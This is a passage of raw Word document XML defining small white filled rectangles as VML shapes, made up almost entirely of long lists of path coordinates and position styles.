8999,3284,8999,3283,8999,3282,8999,3282,8999,3281,8999,3280,8999,3279,8999,3279,8999,3278,8999,3277,8999,3276,8999,3275,8999,3274,8999,3273,8999,3272,8999,3271,8999,3270,8999,3269,8999,3268,8999,3267,8999,3266,8999,3264,8999,3263,8999,3262,8999,3261,8999,3259,8999,3258,8999,3256,8999,3255,8999,3253,8999,3252,8999,3250,8999,3249,8999,3247,8999,3245,8999,3244,8999,3242,8999,3240,8999,3238,8999,3236,8999,3235,8999,3233,8999,3231,8999,3229,8999,3227,8999,3224,8999,3222,8999,3220,8999,3218,8999,3216,8999,3213,8999,3211,8999,3208,8999,3206,8999,3203,8999,3201,8999,3198,8999,3196,8999,3193,8999,3190,8999,3187,8999,3184,8999,3182,8999,3179,8999,3176,8999,3176,8999,3176,8999,3176,8999,3176,8999,3176,8999,3176,8999,3176,8998,3176,8998,3176,8998,3176,8998,3176,8998,3176,8998,3176,8998,3176,8998,3176,8998,3176,8998,3176,8998,3176,8998,3176,8998,3176,8997,3176,8997,3176,8997,3176,8997,3176,8997,3176,8996,3176,8996,3176,8996,3176,8996,3176,8995,3176,8995,3176,8994,3176,8994,3176,8994,3176,8993,3176,8993,3176,8992,3176,8991,3176,8991,3176,8990,3176,8990,3176,8989,3176,8988,3176,8987,3176,8986,3176,8986,3176,8985,3176,8984,3176,8983,3176,8982,3176,8981,3176,8980,3176,8978,3176,8977,3176,8976,3176,8975,3176,8973,3176,8972,3176,8970,3176,8969,3176,8967,3176,8966,3176,8964,3176,8962,3176,8961,3176,8959,3176,8957,3176,8955,3176,8953,3176,8951,3176,8949,3176,8947,3176,8944,3176,8942,3176,8940,3176,8937,3176,8935,3176,8932,3176,8929,3176,8927,3176,8924,3176,8921,3176,8918,3176,8915,3176,8912,3176,8909,3176,8906,3176,8902,3176,8899,3176,8895,3176,8892,3176,8888,3176,8884,3176,8881,3176,8877,3176,8873,3176,8869,3176,8865,3176,8860,3176,8856,3176,8852,3176,8847,3176,8843,3176,8838,3176,8833,3176,8828,3176,8823,3176,8818,3176,8813,3176,8808,3176,8802,3176,8797,3176,8791,3176,8786,3176,8780,3176,8774,3176,8768,3176,8762,3176,8756,3176,8750,3176,8743e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:139.500pt;margin-top:454.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2790,9090" coordsize="130,250">
        <v:shape style="position:absolute;left:2790;top:9090;width:130;height:250" coordorigin="2790,9090" coordsize="130,250" path="m2815,9104l2815,9104,2815,9104,2815,9104,2815,9104,2815,9104,2815,9104,2815,9104,2815,9104,2815,9104,2815,9104,2815,9104,2816,9104,2816,9104,2816,9104,2816,9104,2816,9104,2816,9104,2816,9104,2816,9104,2816,9104,2816,9104,2816,9104,2816,9104,2816,9104,2816,9104,2817,9104,2817,9104,2817,9104,2817,9104,2817,9104,2817,9104,2818,9104,2818,9104,2818,9104,2818,9104,2818,9104,2819,9104,2819,9104,2819,9104,2820,9104,2820,9104,2820,9104,2821,9104,2821,9104,2821,9104,2822,9104,2822,9104,2823,9104,2823,9104,2824,9104,2824,9104,2825,9104,2825,9104,2826,9104,2827,9104,2827,9104,2828,9104,2829,9104,2829,9104,2830,9104,2831,9104,2832,9104,2832,9104,2833,9104,2834,9104,2835,9104,2836,9104,2837,9104,2838,9104,2839,9104,2840,9104,2841,9104,2842,9104,2843,9104,2844,9104,2845,9104,2847,9104,2848,9104,2849,9104,2851,9104,2852,9104,2853,9104,2855,9104,2856,9104,2858,9104,2859,9104,2861,9104,2862,9104,2864,9104,2866,9104,2867,9104,2869,9104,2871,9104,2873,9104,2875,9104,2877,9104,2878,9104,2880,9104,2882,9104,2885,9104,2887,9104,2889,9104,2891,9104,2893,9104,2896,9104,2898,9104,2900,9104,2903,9104,2905,9104,2908,9104,2910,9104,2913,9104,2916,9104,2918,9104,2921,9104,2924,9104,2927,9104,2930,9104,2932,9104,2935,9104,2935,9104,2935,9104,2935,9104,2935,9104,2935,9104,2935,9104,2935,9104,2935,9104,2935,9104,2935,9104,2935,9104,2935,9104,2935,9104,2935,9104,2935,9104,2935,9104,2935,9104,2935,9104,2935,9104,2935,9105,2935,9105,2935,9105,2935,9105,2935,9105,2935,9106,2935,9106,2935,9106,2935,9107,2935,9107,2935,9107,2935,9108,2935,9108,2935,9109,2935,9109,2935,9110,2935,9110,2935,9111,2935,9111,2935,9112,2935,9113,2935,9113,2935,9114,2935,9115,2935,9116,2935,9116,2935,9117,2935,9118,2935,9119,2935,9120,2935,9121,2935,9123,2935,9124,2935,9125,2935,9126,2935,9127,2935,9129,2935,9130,2935,9132,2935,9133,2935,9135,2935,9136,2935,9138,2935,9140,2935,9141,2935,9143,2935,9145,2935,9147,2935,9149,2935,9151,2935,9153,2935,9156,2935,9158,2935,9160,2935,9162,2935,9165,2935,9167,2935,9170,2935,9173,2935,9175,2935,9178,2935,9181,2935,9184,2935,9187,2935,9190,2935,9193,2935,9197,2935,9200,2935,9203,2935,9207,2935,9210,2935,9214,2935,9218,2935,9221,2935,9225,2935,9229,2935,9233,2935,9238,2935,9242,2935,9246,2935,9250,2935,9255,2935,9260,2935,9264,2935,9269,2935,9274,2935,9279,2935,9284,2935,9289,2935,9294,2935,9300,2935,9305,2935,9311,2935,9316,2935,9322,2935,9328,2935,9334,2935,9340,2935,9346,2935,9352,2935,9359,2935,9359,2935,9359,2935,9359,2935,9359,2935,9359,2935,9359,2935,9359,2935,9359,2935,9359,2935,9359,2935,9359,2935,9359,2935,9359,2935,9359,2935,9359,2935,9359,2935,9359,2935,9359,2935,9359,2935,9359,2935,9359,2935,9359,2935,9359,2935,9359,2934,9359,2934,9359,2934,9359,2934,9359,2934,9359,2934,9359,2934,9359,2933,9359,2933,9359,2933,9359,2933,9359,2932,9359,2932,9359,2932,9359,2932,9359,2931,9359,2931,9359,2931,9359,2930,9359,2930,9359,2929,9359,2929,9359,2929,9359,2928,9359,2928,9359,2927,9359,2927,9359,2926,9359,2925,9359,2925,9359,2924,9359,2924,9359,2923,9359,2922,9359,2922,9359,2921,9359,2920,9359,2919,9359,2918,9359,2918,9359,2917,9359,2916,9359,2915,9359,2914,9359,2913,9359,2912,9359,2911,9359,2910,9359,2909,9359,2908,9359,2907,9359,2905,9359,2904,9359,2903,9359,2902,9359,2900,9359,2899,9359,2898,9359,2896,9359,2895,9359,2893,9359,2892,9359,2890,9359,2889,9359,2887,9359,2885,9359,2884,9359,2882,9359,2880,9359,2878,9359,2876,9359,2874,9359,2872,9359,2870,9359,2868,9359,2866,9359,2864,9359,2862,9359,2860,9359,2858,9359,2855,9359,2853,9359,2851,9359,2848,9359,2846,9359,2843,9359,2841,9359,2838,9359,2835,9359,2833,9359,2830,9359,2827,9359,2824,9359,2821,9359,2818,9359,2815,9359,2815,9359,2815,9359,2815,9359,2815,9359,2815,9359,2815,9359,2815,9359,2815,9359,2815,9359,2815,9359,2815,9359,2815,9359,2815,9358,2815,9358,2815,9358,2815,9358,2815,9358,2815,9358,2815,9358,2815,9358,2815,9357,2815,9357,2815,9357,2815,9357,2815,9357,2815,9356,2815,9356,2815,9356,2815,9355,2815,9355,2815,9355,2815,9354,2815,9354,2815,9353,2815,9353,2815,9352,2815,9352,2815,9351,2815,9350,2815,9350,2815,9349,2815,9348,2815,9347,2815,9347,2815,9346,2815,9345,2815,9344,2815,9343,2815,9342,2815,9341,2815,9340,2815,9339,2815,9337,2815,9336,2815,9335,2815,9334,2815,9332,2815,9331,2815,9329,2815,9328,2815,9326,2815,9324,2815,9323,2815,9321,2815,9319,2815,9317,2815,9315,2815,9313,2815,9311,2815,9309,2815,9307,2815,9305,2815,9302,2815,9300,2815,9297,2815,9295,2815,9292,2815,9290,2815,9287,2815,9284,2815,9281,2815,9278,2815,9275,2815,9272,2815,9269,2815,9266,2815,9262,2815,9259,2815,9256,2815,9252,2815,9248,2815,9245,2815,9241,2815,9237,2815,9233,2815,9229,2815,9225,2815,9221,2815,9216,2815,9212,2815,9207,2815,9203,2815,9198,2815,9193,2815,9188,2815,9183,2815,9178,2815,9173,2815,9168,2815,9163,2815,9157,2815,9152,2815,9146,2815,9140,2815,9134,2815,9128,2815,9122,2815,9116,2815,9110,2815,9104e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:175.500pt;margin-top:454.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3510,9090" coordsize="130,250">
        <v:shape style="position:absolute;left:3510;top:9090;width:130;height:250" coordorigin="3510,9090" coordsize="130,250" path="m3536,9104l3536,9104,3536,9104,3536,9104,3536,9104,3536,9104,3536,9104,3536,9104,3536,9104,3536,9104,3536,9104,3536,9104,3536,9104,3536,9104,3536,9104,3536,9104,3536,9104,3536,9104,3536,9104,3536,9104,3536,9104,3536,9104,3536,9104,3537,9104,3537,9104,3537,9104,3537,9104,3537,9104,3537,9104,3537,9104,3538,9104,3538,9104,3538,9104,3538,9104,3538,9104,3539,9104,3539,9104,3539,9104,3539,9104,3540,9104,3540,9104,3540,9104,3541,9104,3541,9104,3541,9104,3542,9104,3542,9104,3543,9104,3543,9104,3544,9104,3544,9104,3545,9104,3545,9104,3546,9104,3546,9104,3547,9104,3548,9104,3548,9104,3549,9104,3550,9104,3550,9104,3551,9104,3552,9104,3553,9104,3554,9104,3554,9104,3555,9104,3556,9104,3557,9104,3558,9104,3559,9104,3560,9104,3561,9104,3562,9104,3563,9104,3565,9104,3566,9104,3567,9104,3568,9104,3570,9104,3571,9104,3572,9104,3574,9104,3575,9104,3577,9104,3578,9104,3580,9104,3581,9104,3583,9104,3584,9104,3586,9104,3588,9104,3589,9104,3591,9104,3593,9104,3595,9104,3597,9104,3599,9104,3601,9104,3603,9104,3605,9104,3607,9104,3609,9104,3611,9104,3614,9104,3616,9104,3618,9104,3621,9104,3623,9104,3626,9104,3628,9104,3631,9104,3633,9104,3636,9104,3639,9104,3641,9104,3644,9104,3647,9104,3650,9104,3653,9104,3656,9104,3656,9104,3656,9104,3656,9104,3656,9104,3656,9104,3656,9104,3656,9104,3656,9104,3656,9104,3656,9104,3656,9104,3656,9104,3656,9104,3656,9104,3656,9104,3656,9104,3656,9104,3656,9104,3656,9104,3656,9105,3656,9105,3656,9105,3656,9105,3656,9105,3656,9106,3656,9106,3656,9106,3656,9107,3656,9107,3656,9107,3656,9108,3656,9108,3656,9109,3656,9109,3656,9110,3656,9110,3656,9111,3656,9111,3656,9112,3656,9113,3656,9113,3656,9114,3656,9115,3656,9116,3656,9116,3656,9117,3656,9118,3656,9119,3656,9120,3656,9121,3656,9123,3656,9124,3656,9125,3656,9126,3656,9127,3656,9129,3656,9130,3656,9132,3656,9133,3656,9135,3656,9136,3656,9138,3656,9140,3656,9141,3656,9143,3656,9145,3656,9147,3656,9149,3656,9151,3656,9153,3656,9156,3656,9158,3656,9160,3656,9162,3656,9165,3656,9167,3656,9170,3656,9173,3656,9175,3656,9178,3656,9181,3656,9184,3656,9187,3656,9190,3656,9193,3656,9197,3656,9200,3656,9203,3656,9207,3656,9210,3656,9214,3656,9218,3656,9221,3656,9225,3656,9229,3656,9233,3656,9238,3656,9242,3656,9246,3656,9250,3656,9255,3656,9260,3656,9264,3656,9269,3656,9274,3656,9279,3656,9284,3656,9289,3656,9294,3656,9300,3656,9305,3656,9311,3656,9316,3656,9322,3656,9328,3656,9334,3656,9340,3656,9346,3656,9352,3656,9359,3656,9359,3656,9359,3656,9359,3656,9359,3656,9359,3656,9359,3656,9359,3656,9359,3656,9359,3656,9359,3656,9359,3656,9359,3656,9359,3656,9359,3656,9359,3656,9359,3656,9359,3655,9359,3655,9359,3655,9359,3655,9359,3655,9359,3655,9359,3655,9359,3655,9359,3655,9359,3655,9359,3654,9359,3654,9359,3654,9359,3654,9359,3654,9359,3654,9359,3653,9359,3653,9359,3653,9359,3653,9359,3652,9359,3652,9359,3652,9359,3651,9359,3651,9359,3651,9359,3650,9359,3650,9359,3649,9359,3649,9359,3648,9359,3648,9359,3647,9359,3647,9359,3646,9359,3646,9359,3645,9359,3645,9359,3644,9359,3643,9359,3643,9359,3642,9359,3641,9359,3640,9359,3640,9359,3639,9359,3638,9359,3637,9359,3636,9359,3635,9359,3634,9359,3633,9359,3632,9359,3631,9359,3630,9359,3629,9359,3628,9359,3627,9359,3626,9359,3625,9359,3623,9359,3622,9359,3621,9359,3619,9359,3618,9359,3617,9359,3615,9359,3614,9359,3612,9359,3611,9359,3609,9359,3607,9359,3606,9359,3604,9359,3602,9359,3600,9359,3599,9359,3597,9359,3595,9359,3593,9359,3591,9359,3589,9359,3587,9359,3585,9359,3582,9359,3580,9359,3578,9359,3576,9359,3573,9359,3571,9359,3569,9359,3566,9359,3564,9359,3561,9359,3558,9359,3556,9359,3553,9359,3550,9359,3547,9359,3545,9359,3542,9359,3539,9359,3536,9359,3536,9359,3536,9359,3536,9359,3536,9359,3536,9359,3536,9359,3536,9359,3536,9359,3536,9359,3536,9359,3536,9359,3536,9359,3536,9358,3536,9358,3536,9358,3536,9358,3536,9358,3536,9358,3536,9358,3536,9358,3536,9357,3536,9357,3536,9357,3536,9357,3536,9357,3536,9356,3536,9356,3536,9356,3536,9355,3536,9355,3536,9355,3536,9354,3536,9354,3536,9353,3536,9353,3536,9352,3536,9352,3536,9351,3536,9350,3536,9350,3536,9349,3536,9348,3536,9347,3536,9347,3536,9346,3536,9345,3536,9344,3536,9343,3536,9342,3536,9341,3536,9340,3536,9339,3536,9337,3536,9336,3536,9335,3536,9334,3536,9332,3536,9331,3536,9329,3536,9328,3536,9326,3536,9324,3536,9323,3536,9321,3536,9319,3536,9317,3536,9315,3536,9313,3536,9311,3536,9309,3536,9307,3536,9305,3536,9302,3536,9300,3536,9297,3536,9295,3536,9292,3536,9290,3536,9287,3536,9284,3536,9281,3536,9278,3536,9275,3536,9272,3536,9269,3536,9266,3536,9262,3536,9259,3536,9256,3536,9252,3536,9248,3536,9245,3536,9241,3536,9237,3536,9233,3536,9229,3536,9225,3536,9221,3536,9216,3536,9212,3536,9207,3536,9203,3536,9198,3536,9193,3536,9188,3536,9183,3536,9178,3536,9173,3536,9168,3536,9163,3536,9157,3536,9152,3536,9146,3536,9140,3536,9134,3536,9128,3536,9122,3536,9116,3536,9110,3536,9104e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:97.500pt;margin-top:472.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1950,9450" coordsize="130,270">
        <v:shape style="position:absolute;left:1950;top:9450;width:130;height:270" coordorigin="1950,9450" coordsize="130,270" path="m1975,9479l1975,9479,1975,9479,1975,9479,1975,9479,1975,9479,1975,9479,1975,9479,1975,9479,1975,9479,1975,9479,1975,9479,1975,9479,1975,9479,1975,9479,1975,9479,1975,9479,1975,9479,1975,9479,1975,9479,1975,9479,1976,9479,1976,9479,1976,9479,1976,9479,1976,9479,1976,9479,1976,9479,1976,9479,1977,9479,1977,9479,1977,9479,1977,9479,1977,9479,1978,9479,1978,9479,1978,9479,1978,9479,1979,9479,1979,9479,1979,9479,1980,9479,1980,9479,1980,9479,1981,9479,1981,9479,1981,9479,1982,9479,1982,9479,1983,9479,1983,9479,1984,9479,1984,9479,1985,9479,1986,9479,1986,9479,1987,9479,1988,9479,1988,9479,1989,9479,1990,9479,1990,9479,1991,9479,1992,9479,1993,9479,1994,9479,1995,9479,1995,9479,1996,9479,1997,9479,1998,9479,1999,9479,2000,9479,2002,9479,2003,9479,2004,9479,2005,9479,2006,9479,2008,9479,2009,9479,2010,9479,2011,9479,2013,9479,2014,9479,2016,9479,2017,9479,2019,9479,2020,9479,2022,9479,2024,9479,2025,9479,2027,9479,2029,9479,2030,9479,2032,9479,2034,9479,2036,9479,2038,9479,2040,9479,2042,9479,2044,9479,2046,9479,2048,9479,2051,9479,2053,9479,2055,9479,2057,9479,2060,9479,2062,9479,2065,9479,2067,9479,2070,9479,2072,9479,2075,9479,2078,9479,2081,9479,2083,9479,2086,9479,2089,9479,2092,9479,2095,9479,2095,9479,2095,9479,2095,9479,2095,9479,2095,9479,2095,9479,2095,9479,2095,9479,2095,9479,2095,9479,2095,9479,2095,9479,2095,9479,2095,9479,2095,9479,2095,9479,2095,9479,2095,9480,2095,9480,2095,9480,2095,9480,2095,9480,2095,9480,2095,9481,2095,9481,2095,9481,2095,9481,2095,9482,2095,9482,2095,9482,2095,9483,2095,9483,2095,9484,2095,9484,2095,9485,2095,9485,2095,9486,2095,9486,2095,9487,2095,9488,2095,9488,2095,9489,2095,9490,2095,9491,2095,9492,2095,9493,2095,9494,2095,9494,2095,9496,2095,9497,2095,9498,2095,9499,2095,9500,2095,9501,2095,9503,2095,9504,2095,9505,2095,9507,2095,9508,2095,9510,2095,9511,2095,9513,2095,9515,2095,9517,2095,9518,2095,9520,2095,9522,2095,9524,2095,9526,2095,9529,2095,9531,2095,9533,2095,9535,2095,9538,2095,9540,2095,9543,2095,9545,2095,9548,2095,9551,2095,9553,2095,9556,2095,9559,2095,9562,2095,9565,2095,9569,2095,9572,2095,9575,2095,9578,2095,9582,2095,9585,2095,9589,2095,9593,2095,9597,2095,9601,2095,9605,2095,9609,2095,9613,2095,9617,2095,9621,2095,9626,2095,9630,2095,9635,2095,9639,2095,9644,2095,9649,2095,9654,2095,9659,2095,9664,2095,9669,2095,9675,2095,9680,2095,9686,2095,9691,2095,9697,2095,9703,2095,9709,2095,9715,2095,9721,2095,9728,2095,9734,2095,9734,2095,9734,2095,9734,2095,9734,2095,9734,2095,9734,2095,9734,2095,9734,2095,9734,2095,9734,2095,9734,2095,9734,2095,9734,2095,9734,2095,9734,2095,9734,2095,9734,2095,9734,2095,9734,2095,9734,2094,9734,2094,9734,2094,9734,2094,9734,2094,9734,2094,9734,2094,9734,2094,9734,2093,9734,2093,9734,2093,9734,2093,9734,2093,9734,2092,9734,2092,9734,2092,9734,2092,9734,2091,9734,2091,9734,2091,9734,2090,9734,2090,9734,2090,9734,2089,9734,2089,9734,2089,9734,2088,9734,2088,9734,2087,9734,2087,9734,2086,9734,2086,9734,2085,9734,2084,9734,2084,9734,2083,9734,2083,9734,2082,9734,2081,9734,2080,9734,2080,9734,2079,9734,2078,9734,2077,9734,2076,9734,2075,9734,2075,9734,2074,9734,2073,9734,2072,9734,2071,9734,2070,9734,2068,9734,2067,9734,2066,9734,2065,9734,2064,9734,2063,9734,2061,9734,2060,9734,2059,9734,2057,9734,2056,9734,2054,9734,2053,9734,2051,9734,2050,9734,2048,9734,2047,9734,2045,9734,2043,9734,2041,9734,2040,9734,2038,9734,2036,9734,2034,9734,2032,9734,2030,9734,2028,9734,2026,9734,2024,9734,2022,9734,2019,9734,2017,9734,2015,9734,2013,9734,2010,9734,2008,9734,2005,9734,2003,9734,2000,9734,1998,9734,1995,9734,1992,9734,1990,9734,1987,9734,1984,9734,1981,9734,1978,9734,1975,9734,1975,9734,1975,9734,1975,9734,1975,9734,1975,9734,1975,9734,1975,9734,1975,9734,1975,9734,1975,9734,1975,9734,1975,9734,1975,9734,1975,9734,1975,9733,1975,9733,1975,9733,1975,9733,1975,9733,1975,9733,1975,9733,1975,9732,1975,9732,1975,9732,1975,9732,1975,9732,1975,9731,1975,9731,1975,9731,1975,9730,1975,9730,1975,9729,1975,9729,1975,9728,1975,9728,1975,9727,1975,9727,1975,9726,1975,9726,1975,9725,1975,9724,1975,9723,1975,9723,1975,9722,1975,9721,1975,9720,1975,9719,1975,9718,1975,9717,1975,9716,1975,9715,1975,9714,1975,9713,1975,9711,1975,9710,1975,9709,1975,9707,1975,9706,1975,9704,1975,9703,1975,9701,1975,9700,1975,9698,1975,9696,1975,9694,1975,9692,1975,9690,1975,9688,1975,9686,1975,9684,1975,9682,1975,9680,1975,9677,1975,9675,1975,9673,1975,9670,1975,9667,1975,9665,1975,9662,1975,9659,1975,9656,1975,9653,1975,9650,1975,9647,1975,9644,1975,9641,1975,9638,1975,9634,1975,9631,1975,9627,1975,9624,1975,9620,1975,9616,1975,9612,1975,9608,1975,9604,1975,9600,1975,9596,1975,9591,1975,9587,1975,9583,1975,9578,1975,9573,1975,9568,1975,9564,1975,9559,1975,9554,1975,9548,1975,9543,1975,9538,1975,9532,1975,9527,1975,9521,1975,9515,1975,9510,1975,9504,1975,9498,1975,9491,1975,9485,1975,9479e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:181.500pt;margin-top:472.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3630,9450" coordsize="130,270">
        <v:shape style="position:absolute;left:3630;top:9450;width:130;height:270" coordorigin="3630,9450" coordsize="130,270" path="m3656,9479l3656,9479,3656,9479,3656,9479,3656,9479,3656,9479,3656,9479,3656,9479,3656,9479,3656,9479,3656,9479,3656,9479,3656,9479,3656,9479,3656,9479,3656,9479,3656,9479,3656,9479,3656,9479,3656,9479,3656,9479,3656,9479,3657,9479,3657,9479,3657,9479,3657,9479,3657,9479,3657,9479,3657,9479,3657,9479,3658,9479,3658,9479,3658,9479,3658,9479,3658,9479,3659,9479,3659,9479,3659,9479,3659,9479,3660,9479,3660,9479,3660,9479,3661,9479,3661,9479,3662,9479,3662,9479,3662,9479,3663,9479,3663,9479,3664,9479,3664,9479,3665,9479,3665,9479,3666,9479,3666,9479,3667,9479,3668,9479,3668,9479,3669,9479,3670,9479,3670,9479,3671,9479,3672,9479,3673,9479,3674,9479,3675,9479,3675,9479,3676,9479,3677,9479,3678,9479,3679,9479,3680,9479,3681,9479,3682,9479,3684,9479,3685,9479,3686,9479,3687,9479,3688,9479,3690,9479,3691,9479,3692,9479,3694,9479,3695,9479,3697,9479,3698,9479,3700,9479,3701,9479,3703,9479,3704,9479,3706,9479,3708,9479,3710,9479,3711,9479,3713,9479,3715,9479,3717,9479,3719,9479,3721,9479,3723,9479,3725,9479,3727,9479,3729,9479,3731,9479,3734,9479,3736,9479,3738,9479,3741,9479,3743,9479,3746,9479,3748,9479,3751,9479,3753,9479,3756,9479,3759,9479,3761,9479,3764,9479,3767,9479,3770,9479,3773,9479,3776,9479,3776,9479,3776,9479,3776,9479,3776,9479,3776,9479,3776,9479,3776,9479,3776,9479,3776,9479,3776,9479,3776,9479,3776,9479,3776,9479,3776,9479,3776,9479,3776,9479,3776,9479,3776,9480,3776,9480,3776,9480,3776,9480,3776,9480,3776,9480,3776,9481,3776,9481,3776,9481,3776,9481,3776,9482,3776,9482,3776,9482,3776,9483,3776,9483,3776,9484,3776,9484,3776,9485,3776,9485,3776,9486,3776,9486,3776,9487,3776,9488,3776,9488,3776,9489,3776,9490,3776,9491,3776,9492,3776,9493,3776,9494,3776,9494,3776,9496,3776,9497,3776,9498,3776,9499,3776,9500,3776,9501,3776,9503,3776,9504,3776,9505,3776,9507,3776,9508,3776,9510,3776,9511,3776,9513,3776,9515,3776,9517,3776,9518,3776,9520,3776,9522,3776,9524,3776,9526,3776,9529,3776,9531,3776,9533,3776,9535,3776,9538,3776,9540,3776,9543,3776,9545,3776,9548,3776,9551,3776,9553,3776,9556,3776,9559,3776,9562,3776,9565,3776,9569,3776,9572,3776,9575,3776,9578,3776,9582,3776,9585,3776,9589,3776,9593,3776,9597,3776,9601,3776,9605,3776,9609,3776,9613,3776,9617,3776,9621,3776,9626,3776,9630,3776,9635,3776,9639,3776,9644,3776,9649,3776,9654,3776,9659,3776,9664,3776,9669,3776,9675,3776,9680,3776,9686,3776,9691,3776,9697,3776,9703,3776,9709,3776,9715,3776,9721,3776,9728,3776,9734,3776,9734,3776,9734,3776,9734,3776,9734,3776,9734,3776,9734,3776,9734,3776,9734,3776,9734,3776,9734,3776,9734,3776,9734,3776,9734,3776,9734,3776,9734,3776,9734,3776,9734,3776,9734,3775,9734,3775,9734,3775,9734,3775,9734,3775,9734,3775,9734,3775,9734,3775,9734,3775,9734,3774,9734,3774,9734,3774,9734,3774,9734,3774,9734,3774,9734,3773,9734,3773,9734,3773,9734,3773,9734,3772,9734,3772,9734,3772,9734,3771,9734,3771,9734,3771,9734,3770,9734,3770,9734,3769,9734,3769,9734,3769,9734,3768,9734,3768,9734,3767,9734,3766,9734,3766,9734,3765,9734,3765,9734,3764,9734,3763,9734,3763,9734,3762,9734,3761,9734,3761,9734,3760,9734,3759,9734,3758,9734,3757,9734,3756,9734,3755,9734,3754,9734,3753,9734,3752,9734,3751,9734,3750,9734,3749,9734,3748,9734,3747,9734,3746,9734,3745,9734,3743,9734,3742,9734,3741,9734,3739,9734,3738,9734,3737,9734,3735,9734,3734,9734,3732,9734,3731,9734,3729,9734,3727,9734,3726,9734,3724,9734,3722,9734,3720,9734,3719,9734,3717,9734,3715,9734,3713,9734,3711,9734,3709,9734,3707,9734,3705,9734,3702,9734,3700,9734,3698,9734,3696,9734,3693,9734,3691,9734,3689,9734,3686,9734,3684,9734,3681,9734,3678,9734,3676,9734,3673,9734,3670,9734,3668,9734,3665,9734,3662,9734,3659,9734,3656,9734,3656,9734,3656,9734,3656,9734,3656,9734,3656,9734,3656,9734,3656,9734,3656,9734,3656,9734,3656,9734,3656,9734,3656,9734,3656,9734,3656,9734,3656,9733,3656,9733,3656,9733,3656,9733,3656,9733,3656,9733,3656,9733,3656,9732,3656,9732,3656,9732,3656,9732,3656,9732,3656,9731,3656,9731,3656,9731,3656,9730,3656,9730,3656,9729,3656,9729,3656,9728,3656,9728,3656,9727,3656,9727,3656,9726,3656,9726,3656,9725,3656,9724,3656,9723,3656,9723,3656,9722,3656,9721,3656,9720,3656,9719,3656,9718,3656,9717,3656,9716,3656,9715,3656,9714,3656,9713,3656,9711,3656,9710,3656,9709,3656,9707,3656,9706,3656,9704,3656,9703,3656,9701,3656,9700,3656,9698,3656,9696,3656,9694,3656,9692,3656,9690,3656,9688,3656,9686,3656,9684,3656,9682,3656,9680,3656,9677,3656,9675,3656,9673,3656,9670,3656,9667,3656,9665,3656,9662,3656,9659,3656,9656,3656,9653,3656,9650,3656,9647,3656,9644,3656,9641,3656,9638,3656,9634,3656,9631,3656,9627,3656,9624,3656,9620,3656,9616,3656,9612,3656,9608,3656,9604,3656,9600,3656,9596,3656,9591,3656,9587,3656,9583,3656,9578,3656,9573,3656,9568,3656,9564,3656,9559,3656,9554,3656,9548,3656,9543,3656,9538,3656,9532,3656,9527,3656,9521,3656,9515,3656,9510,3656,9504,3656,9498,3656,9491,3656,9485,3656,9479e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:223.500pt;margin-top:472.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4470,9450" coordsize="130,270">
        <v:shape style="position:absolute;left:4470;top:9450;width:130;height:270" coordorigin="4470,9450" coordsize="130,270" path="m4496,9479l4496,9479,4496,9479,4496,9479,4496,9479,4496,9479,4496,9479,4496,9479,4496,9479,4496,9479,4496,9479,4496,9479,4496,9479,4496,9479,4496,9479,4496,9479,4497,9479,4497,9479,4497,9479,4497,9479,4497,9479,4497,9479,4497,9479,4497,9479,4497,9479,4497,9479,4497,9479,4498,9479,4498,9479,4498,9479,4498,9479,4498,9479,4498,9479,4499,9479,4499,9479,4499,9479,4499,9479,4500,9479,4500,9479,4500,9479,4500,9479,4501,9479,4501,9479,4502,9479,4502,9479,4502,9479,4503,9479,4503,9479,4504,9479,4504,9479,4505,9479,4505,9479,4506,9479,4506,9479,4507,9479,4507,9479,4508,9479,4509,9479,4509,9479,4510,9479,4511,9479,4512,9479,4512,9479,4513,9479,4514,9479,4515,9479,4516,9479,4517,9479,4518,9479,4519,9479,4520,9479,4521,9479,4522,9479,4523,9479,4524,9479,4525,9479,4526,9479,4528,9479,4529,9479,4530,9479,4531,9479,4533,9479,4534,9479,4536,9479,4537,9479,4538,9479,4540,9479,4542,9479,4543,9479,4545,9479,4546,9479,4548,9479,4550,9479,4552,9479,4554,9479,4555,9479,4557,9479,4559,9479,4561,9479,4563,9479,4565,9479,4568,9479,4570,9479,4572,9479,4574,9479,4576,9479,4579,9479,4581,9479,4584,9479,4586,9479,4589,9479,4591,9479,4594,9479,4596,9479,4599,9479,4602,9479,4605,9479,4607,9479,4610,9479,4613,9479,4616,9479,4616,9479,4616,9479,4616,9479,4616,9479,4616,9479,4616,9479,4616,9479,4616,9479,4616,9479,4616,9479,4616,9479,4616,9479,4616,9479,4616,9479,4616,9479,4616,9479,4616,9479,4616,9480,4616,9480,4616,9480,4616,9480,4616,9480,4616,9480,4616,9481,4616,9481,4616,9481,4616,9481,4616,9482,4616,9482,4616,9482,4616,9483,4616,9483,4616,9484,4616,9484,4616,9485,4616,9485,4616,9486,4616,9486,4616,9487,4616,9488,4616,9488,4616,9489,4616,9490,4616,9491,4616,9492,4616,9493,4616,9494,4616,9494,4616,9496,4616,9497,4616,9498,4616,9499,4616,9500,4616,9501,4616,9503,4616,9504,4616,9505,4616,9507,4616,9508,4616,9510,4616,9511,4616,9513,4616,9515,4616,9517,4616,9518,4616,9520,4616,9522,4616,9524,4616,9526,4616,9529,4616,9531,4616,9533,4616,9535,4616,9538,4616,9540,4616,9543,46